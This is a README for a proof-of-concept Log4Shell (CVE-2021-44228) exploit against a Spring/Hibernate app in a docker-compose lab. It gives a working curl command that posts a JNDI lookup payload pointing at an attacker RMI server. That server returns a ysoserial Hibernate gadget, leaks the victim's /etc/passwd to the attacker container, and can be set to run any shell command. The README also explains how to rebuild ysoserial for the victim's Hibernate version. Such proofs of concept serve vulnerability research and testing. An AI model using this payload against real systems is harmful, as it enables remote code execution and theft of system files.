# CVE-2021-44228 POC - Spring / Hibernate

_This POC uses Spring / Hibernate, but the same approach (a JNDI lookup pointing at an RMI server that hands back a serialized gadget, which the victim then deserializes) can be used to trigger any deserialization vulnerability for which a gadget chain is present on the victim's classpath._


```sh
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'
```

The payload is single-quoted so the shell does not try to expand `${...}` itself. You should see the contents of the victim's `/etc/passwd` appear in the logs of the `attacker` container.
You can replace the command configured in the `exploit` service to run any shell command on the victim.

## Victim

The victim is running a standard [starter spring app](!type=gradle-project&language=java&platformVersion=2.6.1&packaging=jar&jvmVersion=11&groupId=dev.uint0.pocs&artifactId=cve202144228&name=cve202144228&description=CVE-2021-44228%20POC%20-%20Spring%20%2F%20Hibernate&packageName=dev.uint0.pocs.cve202144228&dependencies=data-jpa,web,h2) with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only two modifications have been made on top of it:

1. Removed tests
2. Replaced the `slf4j` logger with the vulnerable `log4j`

All other dependencies are up to date, and no special JVM flags or system properties are set; the victim runs with its default configuration.

The victim exposes a `POST`-able endpoint on `/` that logs the request body via `log4j`, which is where the `${jndi:...}` lookup in the posted body gets evaluated.

## Exploit

The exploit relies on a fork of [ysoserial]( using the `Hibernate` payload generator. Because the victim runs the latest version of Hibernate, ysoserial has to be recompiled against that version so the serialized gadget matches the Hibernate classes on the victim's classpath.